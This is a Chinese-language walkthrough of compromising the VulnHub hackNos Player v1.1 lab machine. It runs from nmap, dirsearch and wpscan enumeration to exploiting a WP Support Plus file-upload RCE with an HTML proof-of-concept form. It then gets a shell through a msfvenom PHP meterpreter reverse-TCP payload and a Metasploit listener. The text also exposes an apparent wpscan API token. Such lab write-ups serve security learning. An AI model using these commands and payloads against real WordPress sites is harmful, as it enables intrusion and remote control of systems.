靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/
一、信息收集
步骤一:导入并配置靶机为桥接模式而后开启...获取其MAC地址信息...如下...
步骤二:使用nmap对网络进行扫描并发现192.168.7.9是要攻击的目标...确认开放的端口...
步骤三:访问网站...并使用dirsearch进行目录扫描...没有啥有价值的信息...
dirsearch -u http://192.168.7.9/
步骤四:回到页面上发现网站路径...为/var/www/html/g@web
对其进行访问使用火狐插件Wappalyzer
发现站点为Wordpress5.3.2
...
步骤五:再次使用dirsearch进行目录扫描
dirsearch -u http://192.168.7.9/g@web/
拼接/wp-login.php,发现一个登录框
步骤六:尝试使用wpscan
列出站点的用户和密码...
wpscan --url https://www.xxxxx.wiki/ #扫描站点
wpscan --url https://www.xxxxx.wiki/ --enumerate p #扫描插件
wpscan --url http://xx.xx.xx.xx/g@web/ --enumerate u #枚举用户
枚举用户
wpscan --url http://192.168.7.9/g@web/ --enumerate u
步骤七:拼接/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1访问...可在描述字段中发现一个密码hackNos@9012!!
对其默认后台登录界面访问并尝试登录...
输入wp-local hackNos@9012登录失败显示密码不正确
步骤八:使用wpscan对其网站进行漏洞扫描...发现远程代码执行漏洞...对其利用信息访问...拿取到POC并修改保存成HTML文件..
wpscan --url http://192.168.7.9/g@web -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8
发现远程代码执行漏洞 ——>WP Support Plus Responsive Ticket System < 8.0.8 – Remote Code Execution (RCE) | Plugin Vulnerabilities,访问得到利用代码(漏洞验证网站)
<form method="post" enctype="multipart/form-data" action="http://192.168.7.9/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
After doing this, an uploaded file can be accessed at, say:
http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml
二、GetShell
步骤九:使用MSF生成PHP木马并开启监听(漏洞验证网站建议我们使用.phtml后缀绕过)...
####生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.250 LPORT=4455 x> shell.phtml
####开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.7.250
set LPORT 4455
exploit
####Shell上传页面
http://192.168.1.124/g@web/wp-content/uploads/wpsp/
####调用/bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
kali开启一个服务
浏览器访问192.168.7.250:8000(kali的ip及服务开放的端口)
将生成的shell.phtml下载到本地进行上传
拼接访问/g@web/wp-content/uploads/wpsp/
点击172...shell.phtml,查看kali发现反弹成功